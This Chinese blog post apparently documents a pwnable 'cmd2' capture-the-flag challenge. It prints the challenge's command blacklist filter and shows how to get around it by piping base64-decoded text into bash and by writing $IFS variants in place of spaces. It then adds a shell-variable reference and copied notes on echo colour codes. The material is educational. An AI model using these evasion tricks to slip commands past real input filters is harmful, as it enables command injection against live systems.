pwnable之cmd2 & & shell 命令绕过技巧

最新推荐文章于 2024-08-28 08:59:27 发布

pwd_3

最新推荐文章于 2024-08-28 08:59:27 发布

阅读量690

点赞数

分类专栏： pwnable shell 文章标签： cmd pwnable shell bypass

本文链接：https://blog.csdn.net/pwd_3/article/details/77154472

版权

pwnable 同时被 2 个专栏收录

9 篇文章 0 订阅

订阅专栏

shell

1 篇文章 0 订阅

订阅专栏

pwnable之cmd2

与cmd1 不同的是，它对argv[1]进行了过滤

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "=")!=0;
        r += strstr(cmd, "PATH")!=0;
        r += strstr(cmd, "export")!=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "`")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
}

不能包含”/”,”`”，”flag”等字符,如果长度无限制的话可以利用base解码在执行来绕过

~$ echo "ls" | base64
bHMK
~$ echo "bHMK" | base64 -d | bash
~   Documents Desktop  Downloads  
~$

另外还有用$IFS替换空格的方法。

~$ ls$IFS-al
总用量 1084
-rw-------  1 root root   1024 8月   3 20:47 ~
略

如果$IFS后有数字或者字母，可会被当做变量，可以使用下面的方式绕过

$IFS$()
$IFS$9

~$ cat$IFSexp.py
bash: cat.py: 未找到命令
~$ cat$IFS$()exp.py
#!/usr/bin/env python
略

附shellt特殊变量

$进程信息$

Variable	Description
$$	当前shell的进程ID
$PPID	shell父进程的ID
$?	上一条命令的退出状态
$_	上一条指令名
$!	Process ID of last process run in the background using ampersand (&) operator. This is commonly used in conjunction with the wait builtin.
$PATH	显示用’:’分隔的可信可执行文件安装路径，在这些路径下的可执行文件能在不提供完整路径的条件下执行，如’ls’。

域和记录解析（ $Field$ and $record$ $parsing$ ）

Variable	Description
$IFS	Input Field Separators

用户信息

Variable	Description
$HOME	用户的home目录
$UID	用户ID
$USER	用户的登录名

其他值

Variable	Description
$#	传递给shell的参数个数
$@	传递给shell的参数的完整列表，空格分隔。
$*	传递给shell的参数的完整列表，由IFS（输入字段分隔符）变量的第一个字符分隔开。
$-	当前启用的所有shell标志的列表
$PWD	当前工作路径

查资料时找到的echo输出不同颜色字体背景

下文出自 “相濡以沫” 博客，此出处http://onlyzq.blog.51cto.com/1228/546459

echo显示带颜色，需要使用参数-e
格式如下:
echo -e “\033[字背景颜色;文字颜色m字符串\033[0m”
例如:
echo -e “\033[41;37m TonyZhang \033[0m”
其中41的位置代表底色, 37的位置是代表字的颜色
注：
1、字背景颜色和文字颜色之间是””
2、文字颜色后面有个m
3、字符串前后可以没有空格，如果有的话，输出也是同样有空格
下面看几个例子：

echo -e "\033[30m 黑色字 \033[0m"
echo -e "\033[31m 红色字 \033[0m"
echo -e "\033[32m 绿色字 \033[0m"
echo -e "\033[33m 黄色字 \033[0m"
echo -e "\033[34m 蓝色字 \033[0m"
echo -e "\033[35m 紫色字 \033[0m"
echo -e "\033[36m 天蓝字 \033[0m"
echo -e "\033[37m 白色字 \033[0m"
 ```

 ```
echo -e "\033[40;37m 黑底白字 \033[0m"
echo -e "\033[41;37m 红底白字 \033[0m"
echo -e "\033[42;37m 绿底白字 \033[0m"
echo -e "\033[43;37m 黄底白字 \033[0m"
echo -e "\033[44;37m 蓝底白字 \033[0m"
echo -e "\033[45;37m 紫底白字 \033[0m"
echo -e "\033[46;37m 天蓝底白字 \033[0m"
echo -e "\033[47;30m 白底黑字 \033[0m"

控制选项说明：

\33[0m 关闭所有属性 
\33[1m 设置高亮度 
\33[4m 下划线 
\33[5m 闪烁 
\33[7m 反显 
\33[8m 消隐 
\33[30m -- \33[37m 设置前景色 
\33[40m -- \33[47m 设置背景色 
\33[nA 光标上移n行 
\33[nB 光标下移n行 
\33[nC 光标右移n行 
\33[nD 光标左移n行 
\33[y;xH设置光标位置 
\33[2J 清屏 
\33[K 清除从光标到行尾的内容 
\33[s 保存光标位置 
\33[u 恢复光标位置 
\33[?25l 隐藏光标 
\33[?25h 显示光标